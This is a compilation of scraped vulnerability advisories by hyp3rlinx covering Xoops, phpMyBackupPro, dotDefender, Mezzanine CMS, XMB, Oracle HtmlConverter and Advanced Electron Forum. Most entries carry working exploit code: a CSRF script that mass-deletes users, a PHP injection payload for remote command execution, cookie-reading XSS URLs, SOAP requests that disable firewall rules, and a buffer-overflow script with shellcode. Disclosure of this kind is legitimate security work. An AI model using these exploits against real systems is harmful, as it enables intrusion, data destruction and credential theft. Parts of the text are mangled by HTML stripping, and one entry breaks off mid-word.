Severity Level:
High
Description:
Request Method(s):[+] POST
Vulnerable Product: [+] Trend Micro Deep Discovery Inspector V3.8
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
Xoops 2.5.7.2 CSRF - Arbitrary User Deletions
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt
Vendor:
=
xoops.org
Product:
Xoops 2.5.7.2
Vulnerability Type:
===
CSRF - Arbitrary User Deletions
Vulnerability Details:
=
Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL
users from the Xoops database.
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
=
Following CSRF attack delete all users from database, following POC code will
sequentially delete 100 users from the Xoops application.
var c=-1
var amttodelete=100
var id=document.getElementById("ids")
var frm=document.getElementById("CSRF")
function doit(){
c++
arguments[1].value=c
arguments[0].submit()
if(c>=amttodelete){
clearInterval(si)
alert("Done!")
}
}
var si=setInterval(doit, 1000, frm, id)
Disclosure Date:
==
Jan 29, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
=
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere. (c) hyp3rlinx.
hyp3rlinx
Xoops 2.5.7.2 Directory Traversal Bypass
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt
Vendor:
=
xoops.org
Product:
Xoops 2.5.7.2
Vulnerability Type:
===
Directory Traversal Bypass
Vulnerability Details:
=
Xoops 2.5.7.2 has checks to defend against directory traversal attacks.
However, they can be easily bypassed by simply issuing "..././" instead of
"../"
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
==
In Xoops code in 'protector.php' the following check is made for dot dot slash
"../" in HTTP requests
/
if( is_array( $_GET[ $key ] ) ) continue ;
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) {
$this->last_error_type = 'DirTraversal' ;
$this->message .= "Directory Traversal '$val' found.\n" ;
The above Xoops directory traversal check can be defeated by using
..././..././..././..././
you can test the theory by using example below test case by supplying ..././ to
GET param.
$val=$_GET['c'];
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) {
echo "traversal!";
}else{
echo "ok!" . $val;
}
Disclosure Date:
==
Feb 2, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
==
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere. (c) hyp3rlinx.
hyp3rlinx
Microsoft PowerPointViewer Code Execution
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-PPT-VIEWER-CODE-EXEC.txt Vendor: === www.microsoft.com Product: Microsoft PowerPoint Viewer version: 12.0.6600.1000 Vulnerability Type: DLL Hijack Arbitrary Code Execution Vulnerability Details: = Microsoft PowerPoint Viewer 'POWERPNT.EXE' will execute arbitrary code if an attacker can place a DLL named "api-ms-win-appmodel-runtime-l1-1-0.dll" in users downloads directory. This exploit does NOT rely on any embedded OLE objects or CLSID registered COM objects in the document to execute. 1) create malicious DLL named "api-ms-win-appmodel-runtime-l1-1-0.dll" 2) place DLL in users downloads directory via download driveby etc... 3) open an existing .PPT document from the downloads directory e.g. "C:\Users\Downloads\somefile.ppt" then BOM ... Tested on: Windows 7 SP1 x64 Disclosure Timeline: = Vendor Notification: February 23, 2016 vendor replies DLL side loading issue already publicly known. a google search returned following results: 1) examples using embedded OLE objects and MS Word etc 2) old posts 3) examples not referencing "api-ms-win-appmodel-runtime-l1-1-0.dll" DLL February 29, 2016 : Public Disclosure. Severity Level: High Description: vulnerable DLL: "api-ms-win-appmodel-runtime-l1-1-0.dll" Vulnerable Product: Microsoft PowerPoint Viewer 'POWERPNT.EXE' [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Re: Symantec EP DOS
*** Be aware "Gerado Sanchez" is re-posting and stealing vulnerability reports work/credits as his own, he is also using similar nicknames, emails etc. ORIGINAL Symantec EP DOS POST from "hyp3rlinx" is found here dated Jul 08 2015. http://www.securityfocus.com/archive/1/535958
CyberCop Scanner Smbgrind v5.5 Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SMBGRIND-BUFFER-OVERFLOW.txt Vendor: === Network Associates Inc. Product: === smbgrind: NetBIOS parallel password grinder circa 1996-1999 smbgrind.exe is a component of CyberCop Scanner v5.5. It is intended to remotely crack SMB usernames and passwords, used to establish a login session to the remote NetBIOS file server. Cybercop was discontinued back in 2002. usage: smbgrind -i [options] -r Remote NetBIOS name of destination host -i IP address of destination host -u Name of userlist file (default NTuserlist.txt) -p Name of password list file (default NTpasslist.txt) -l Number of simultaneous connections (max: 50 default: 10) -v Provide verbose output on progress Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: == Smbgrind.exe succumbs to buffer overflow when supplied a large number of bytes (1206) for the -r switch for the remote NetBios name of destination host. Resulting in memory corruption overwriting several registers... GDB dump... Program received signal SIGSEGV, Segmentation fault. 0x0040c421 in ?? () (gdb) info r eax0x3 3 ecx0x41414141 1094795585 edx0x41414141 1094795585 ebx0x41414141 1094795585 esp0x241e89c0x241e89c ebp0x241e8a80x241e8a8 esi0x401408 4199432 edi0x41414141 1094795585 eip0x40c421 0x40c421 eflags 0x10283 [ CF SF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x53 83 gs 0x2b 43 (gdb) smbgrind core dump file... (C:\smbgrind.exe 1000) exception C005 at 40C421 (C:\smbgrind.exe 1000) exception: ax 2 bx 41414141 cx 41414141 dx 41414141 (C:\smbgrind.exe 1000) exception: si 401408 di 41414141 bp 241F39C sp 241F390 (C:\smbgrind.exe 1000) exception is: STATUS_ACCESS_VIOLATION [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
phpMyBackupPro v.2.5 Remote Command Execution / CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-RCE.txt
Vendor:
=
www.phpmybackuppro.net
project site:
sourceforge.net/projects/phpmybackup/
Product:
===
phpMyBackupPro v.2.5 (PMBP)
phpMyBackup Pro is a very easy to use, free, web-based MySQL backup
application, licensed under the GNU GPL.
You can create scheduled backups, manage and restore them, download or email
them and a lot more.
Vulnerability Type:
=
Remote Command Execution / CSRF
CVE Reference:
==
N/A
Vulnerability Details:
=
phpMyBackupPro uses PHP configuration files (global_conf.php) to manage
settings, allowing user to change things like sql host, language, email etc..
However, a malicious local user can also inject persistent arbitrary PHP/OS
commands into the configuration to be executed on the host system.
The remote command execution can also be a result of a CSRF driveby by if
currently logged admin visits an attackers webpage.
Attackers can inject and write to disk arbitrary PHP code into the
global_conf.php configuration file if a victim visits a malicious webpage or
clicks an
infected link via a CSRF vector or additionally from a local malicious user in
shared host type environment.
first we escape the single quotes etc... so we can close the expected entry,
then we leverage the backtick "`" operator to have PHP execute OS commands
on victims system as it works just as well without having to deal with all the
quote escaping.
e.g. payload that handles the single "'" quote an forward slashes "/"...
''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\';
The above when injected will result in a write to $CONF variables in
global_conf.php as follows...
$CONF['lang']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); ///\';');
OR...
$CONF['email']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); ///\';');
Exploit code(s):
===
Send admin infected link or convince them to visit our malicious webpage, then
if the user is logged in and...
a) clicks our link or visits our evil webpage or
b) submits the form locally (malicious user) then BOOOM!
Exploit to run calc.exe on Windows
var c=0;
(function RCE_MAYHEM(){
c++
var xhr=new XMLHttpRequest()
xhr.open('POST','<a rel="nofollow" href="http://localhost/phpMyBackupPro-2.5/phpMyBackupPro-2.5/config.php">http://localhost/phpMyBackupPro-2.5/phpMyBackupPro-2.5/config.php</a>',true)
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
xhr.send("sitename=localhost&lang=''///\\');exec(`c:/\Windows/\system32/\calc.exe`);
///\';&sql_host=localhost&sql_user=&sql_passwd=&sql_db=&ftp_server=hyp3rlinx.altervista.org&ftp_user=hyp3rlinx&ftp_passwd=&ftp_path=&ftp_pasv=1&ftp_port=666&ftp_del=1&email_use=1&email=&submit=Save+data")
if(c<2){
RCE_MAYHEM()
}
})()
Disclosure Timeline:
=
Vendor Notification: NR
February 16, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
High
Description:
=
Request Method(s):[+] POST
Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP)
Vulnerable Parameter(s): [+] $CONF
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
phpMyBackupPro v.2.5 Arbitrary File Upload
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-FILE_UPLOAD_VULN.txt Vendor: = www.phpmybackuppro.net project site: sourceforge.net/projects/phpmybackup/ Product: === phpMyBackupPro v.2.5 (PMBP) phpMyBackup Pro is a very easy to use, free, web-based MySQL backup application, licensed under the GNU GPL. You can create scheduled backups, manage and restore them, download or email them and a lot more. Vulnerability Type: Arbitrary File Upload CVE Reference: == N/A Vulnerability Details: = phpMyBackupPro allows SQL uploads but fails to check the actual file type, allowing arbitrary file uploads which can lead to arbitrary OS command, backdoor shells etc... Exploit code(s): === Arbitary File Upload under "database queries" user has option to 'Upload sql file': 1) upload malicious PHP file containing as an SQL import using select "fragmented". 2) click 'Yes' when prompted 'Do you really want to import this backup?' 3) make HTTP request to process the uploaded PHP file e.g. http://localhost/phpMyBackupPro-2.5/export/EVIL.php and BOOM! 'export' directory comes unprotected with no .htaccess file etc.. and most important file upload type is not checked. Disclosure Timeline: = Vendor Notification: NR February 16, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: High Description: = Request Method(s):[+] POST Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP) [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
phpMyBackupPro v.2.5 XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-XSS.txt
Vendor:
=
www.phpmybackuppro.net
project site:
sourceforge.net/projects/phpmybackup/
Product:
===
phpMyBackupPro v.2.5 (PMBP)
phpMyBackup Pro is a very easy to use, free, web-based MySQL backup
application, licensed under the GNU GPL.
You can create scheduled backups, manage and restore them, download or email
them and a lot more.
Vulnerability Type:
XSS
CVE Reference:
==
N/A
Vulnerability Details:
=
phpMyBackupPro is vulnerable to multiple XSS entry points allowing arbitrary
client side code execution within victims browser.
Undermining the trust between the client and server...if the user clicks an
infected linx or visits a malicious webpage.
Exploit code(s):
===
XSS 1)
http://localhost/phpMyBackupPro-2.5/get_file.php?download=true=%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E
XSS 2)
http://localhost/phpMyBackupPro-2.5/db_info.php?table=alert('XSS
hyp3rlinx')
XSS 3)
http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=phpdug=%3Cscript%3Ealert%28666%29%3C%2Fscript%3E=0=0=0=0=1
XSS 4)
http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=alert(666)<%2Fscript>&fn=http%3A%2F%2Fhyp3rlinx.altervista.org%2Fhell.sql&start=0&foffset=0&totalqueries=0&sn=0&delete=1
XSS 5)
<form id="XSS" action="<a rel="nofollow" href="http://localhost/phpMyBackupPro-2.5/sql_query.php"">http://localhost/phpMyBackupPro-2.5/sql_query.php"</a>;
method="post">
<input type="hidden" name="db" value="mysql" />
<input type="hidden" name="sql_query" value="<script>alert('XSS hyp3rlinx
\n\n'+document.cookie)" />
document.getElementById('XSS').submit()
Disclosure Timeline:
=
Vendor Notification: NR
February 16, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
High
Description:
=
Request Method(s):[+] GET / POST
Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP)
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
dotDefender Firewall CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt
Vendor:
==
www.applicure.com
Product:
=
dotDefender Firewall
Versions: 5.00.12865 / 5.13-13282
dotDefender is a Web application firewall (WAF) for preventing hacking
attacks like XSS, SQL Injections, CSRF etc...
that provides Apache and IIS Server Security across Dedicated, VPS and
Cloud environments. It meets PCI Compliance and also
provides E-Commerce Security, IIS and Apache Security, Cloud Security and
more.
Vulnerability Type:
=
Cross Site Request Forgery - CSRF
CVE Reference:
==
N/A
Vulnerability Details:
=
Dotdefender firewall (WAF) is vulnerable to cross site request forgery,
this allows attackers to make HTTP requests via the victims browser to
the dotdefender management server on behalf of the victim if the victim is
logged in and visits a malicious web page or clicks an infected link.
Result can be modifying or disabling various firewall patterns,
User-Defined Rule settings and global event logging etc...
HTTP requests sent to Dotdefender to enable or disable user-Defined rule
settings are base64 encoded using SOAP protocol.
Sending the below base64 value for example disables a Dotdefender firewall
setting.
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
false
Tested successfully on Windows & Linux:
dotDefender Version: 5.00.12865
Web Server Type: Microsoft-IIS
Server Operating System: Windows
Web Server Version: 7.5
Firefox web browser
dotDefender Version: 5.13-13282
Web Server Type: Apache
Server Operating System: Linux
Exploit code(s):
===
Example to send requests to disable firewall rule settings that defends
against SQL injection.
We need to send two requests first to modify the desired settings and
second to commit our changes.
HTTP request 0x01 - send following soap request to disable SQL Injection
request firewall rule
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
http://localhost/dotDefender/dotDefenderWS.exe; ENCTYPE="text/plain"
method="post" onsubmit="TORMENT()">
document.getElementById('SACRIFICIAL').submit()
HTTP request 0x02 - send the next request to commit the changes
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
http://localhost/dotDefender/dotDefenderWS.exe; ENCTYPE="text/plain"
method="post">
function
TORMENT(){document.getElementById('VICTIM').submit()}
Other SOAP payload examples for rule disabling:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
this is disable a rule #19, send the below request to disable remote IP
protections:
http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:ZSI="
http://www.zolera.com/schemas/ZSI/;
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/; xmlns:SOAP-ENC="
http://schemas.xmlsoap.org/soap/encoding/;
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/;
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>
http://applicure.com/dotDefender;>0
/ud_rules/request_rules/request_rule[rule_id=19]/enabled
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
disable rule 20:
~=~=~=~=~=~=~=~=
http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/;
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/;
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>http://applicure.com/dotDefender;>
0/ud_rules/request_rules/request_rule[rule_id=20]/enabled
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
Finally commit them with below request:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/;
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/;
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>http://applicure.com/dotDefender;>
0
Disclosure Timeline:
Vendor Notifications:
initial report 11/16/2015
vendor response 11/20/2015
vendor delays for two months
1/19/2016 Vendor finally acknowledges vulnerability
inform vendor of a disclosure date
vendor no longer responds
Feb 8, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
==
High
Descr
Mezzanine CMS 4.1.0 XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MEZZANINE-CMS-XSS.txt Vendor: === mezzanine.jupo.org Product: Mezzanine 4.1.0 Mezzanine is an open source CMS built using the python based Django framework. Vulnerability Type: === XSS CVE Reference: == N/A Vulnerability Details: = XSS entry points exists within the filebrowser_safe package. In many areas throughout filebrowser, querystring parameters are passed directly into templates to form URLS for links and forms, and these were not being escaped correctly, therefore allowing arbitrary JavaScript code to be injected. In order to exploit this, a attacker would need to trick an authenticated administrator into clicking a malicious link or viewing a malicious web page containing the XSS payload. Resolution: Upgrade right away (pip install -U filebrowser_safe). If for some reason you're unable to upgrade seamlessly, here is the fix which you need to apply: https://github.com/stephenmcd/filebrowser-safe/commit/14b30017d27ca6a952e1578ed8cecbb102979967 Exploit code(s): === XSS 1) http://localhost:8000/admin/media-library/rename/?ot=desc=date=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E XSS 2) http://localhost:8000/admin/media-library/rename/?ot=desc=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E= XSS 3) http://localhost:8000/admin/media-library/rename/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E== XSS 4) http://localhost:8000/admin/media-library/browse/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=gallery=date XSS 5) http://localhost:8000/admin/media-library/upload/?ot=desc=gallery=%3C%2Fscript%3E%3Cscript%3Ealert%28666%29%3C%2Fscript%3E XSS 6) http://localhost:8000/admin/media-library/upload/?ot=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS\n\nhyp3rlinx%27%29%3C%2Fscript%3E=gallery=date XSS 7) http://localhost:8000/admin/media-library/upload//static/filebrowser/uploadify/?=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E Disclosure Timeline: = Vendor Notification: January 26, 2016 Feburary 2, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: === Request Method(s):[+] GET Vulnerable Product: [+] Mezzanine 4.1.0 === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
XMB - eXtreme Message Board v1.9.11.13 Weak Crypto
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XMB-WEAK-CRYPTO.txt
Vendor:
==
xmbforum2.com
Product:
==
XMB - eXtreme Message Board v1.9.11.13
XMB forum software is open source and runs PHP scripts with a MySQL database
backend.
Vulnerability Type:
===
Weak Crypto / Insecure Password Storage
Vulnerability Details:
=
1) Weak Crypto
XMB Forum uses weak MD5 hashing algorithm and no salt, the unsalted passwords
are then stored in a browser cookie and also in the 'xmb_members'
table of the XMB database. Using weak cryptographic one-way hash functions like
MD5 without using salt for storing user passwords allows attackers
that gain access to this data ability to conduct password cracking attacks
using pre-computed dictionaries, e.g. rainbow tables.
2) Insecure Storage
Storing user passwords in unsalted MD5 hash form leaves them vulnerable both
online and offline. I noticed XMB has no session timeout/logout mechanism
for if a user is inactive for a certain period of time and does not logout,
leaving thier MD5 unsalted passwords stored in cookies on disc. This further
allows thier passwords to be vulnerable to theft if their local machine is
compromised. However, even if the user logs out and XMB cookies are cleared
the passwords are still in the MySQL database on the server unsalted and MD5
hashed.
POC:
=
Example XMB cookie ...
MD5 password of 'abc123' > 'e99a18c428cb38d5f260853678922e03'
"xmblva=1453182891; xmblvb=1453178920; xmbuser=admin;
xmbpw=e99a18c428cb38d5f260853678922e03; xmblva=1453091894;
On disc ---> %APPDATA%\Roaming\Mozilla\Firefox\Profiles in the 'cookies.sqlite'
database file used by Firefox.
e.g.
localhostxmbpwe99a18c428cb38d5f260853678922e03localhost/XMB-1.9.11.13/files
In "member.php" on line 493 under files/ dir of XMB application we see hashing
of user password using weak MD5 hashing function, then being stored
in the MySQL database.
$password = md5($password);
if ($SETTINGS['regoptional'] == 'off') {
$db->query("INSERT INTO ".X_PREFIX."members (username, password, regdate,
postnum, email,
etc
In 'member.php' line 599 we see it stored in cookie ---> put_cookie("xmbpw",
$password, $currtime, $cookiepath, $cookiedomain);
Disclosure Date:
Vendor Notification: NA
January 23, 2016 : Public Disclosure
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
Oracle HtmlConverter.exe Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt
Vendor:
===
www.oracle.com
Product:
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50
The HTML Converter is part of Java SE binary part of the JDK and Allows web
page authors to explicitly target
the browsers and platforms used in their environment when modifying their pages.
Vulnerability Type:
Buffer Overflow
CVE Reference:
==
N/A
Vulnerability Details:
=
When calling htmlConverter.exe with specially crafted payload it will cause
buffer overflow executing arbitrary attacker supplied code.
This was a small vulnerability included as part of the overall Oracle CPU
released on January 19, 2016.
Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
registers ...
EAX FFFE
ECX FFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 1DB1
EDI
EIP 52525252 < "" \x52
C 0 ES 002B 32bit 0()
P 0 CS 0023 32bit 0()
A 1 SS 002B 32bit 0()
Z 0 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
Exploit code(s):
===
###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "#EIP
@ 2493
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe " #EIP
2469 - 2479
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#JMP ESP kernel32.dll
rp=struct.pack('<L', 0x76E72E2B)
payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)
Disclosure Timeline:
=
Vendor Notification: August 28, 2015
January 20, 2016 : Public Disclosure
Exploitation Technique:
===
Local
Severity Level:
===
Medium
Description:
=
Vulnerable Product: [+] Java SE 6 U24 HtmlConverter.exe
=
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
Advanced Electron Forum v1.0.9 Persistent XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt
Vendor:
=
www.anelectron.com/downloads/
Product:
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
===
Persistent XSS
CVE Reference:
==
N/A
Vulnerability Details:
=
In Admin panel under Edit Boards / General Stuff / General Options
There is an option to sepcify a redirect URL for the forum.
See --> Redirect Forum:
Enter a URL to which this forum will be redirected to.
The redirect input field is vulnerable to a persistent XSS that will be stored
in the MySQL database
and execute attacker supplied client side code each time a victim visits the
following URLs.
http://localhost/AEF(1.0.9)_Install/index.php?
http://localhost/AEF(1.0.9)_Install/index.php?act=admin=forums=editforum=1
Exploit code(s):
===
Persistent XSS
http://localhost/AEF(1.0.9)_Install/index.php?act=admin=forums=editforum=1"
method="post">
document.getElementById('XSS-DE-PERSISTO').submit()
Some other misc XSS(s) under 'Signature' area.
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=signature
on Anchor link setting
http://"onMouseMove="alert(0)
AND
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=writepm
email link:
mailto:"onMouseMove="alert(1)
Disclosure Timeline:
=
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
High
Description:
=
Request Method(s):[+] POST
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
Vulnerable Parameter(s): [+] 'fredirect'
=
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
Advanced Electron Forum v1.0.9 CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt
Vendor:
=
www.anelectron.com/downloads/
Product:
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
===
CSRF
CVE Reference:
==
N/A
Vulnerability Details:
=
In Admin panel no CSRF protections exist in multiple areas allowing remote
attackers to make HTTP request on behalf of the victim if they
currently have a valid session (logged in) and visit or click an infected link,
resulting in some of the following destructions.
0x01: Change current database settings
0x02: Delete all Inbox / Sent Emails
0x03: Delete all 'shouts'
0x04: Delete all Topics
by the way, edit profile, avatar and more all seem vulnerable as well..
Exploit code(s):
===
CSRF 0x01:
change mysql db settings
note: however you will need to know or guess the database name.
http://localhost/AEF(1.0.9)_Install/index.php?act=admin=conpan=mysqlset"
method="post" name="mysqlsetform">
document.getElementById('DOOM').submit()
CSRF 0x02:
Delete all Inbox / Sent emails...
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=sentitems"
method="post">
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=inbox"
method="post">
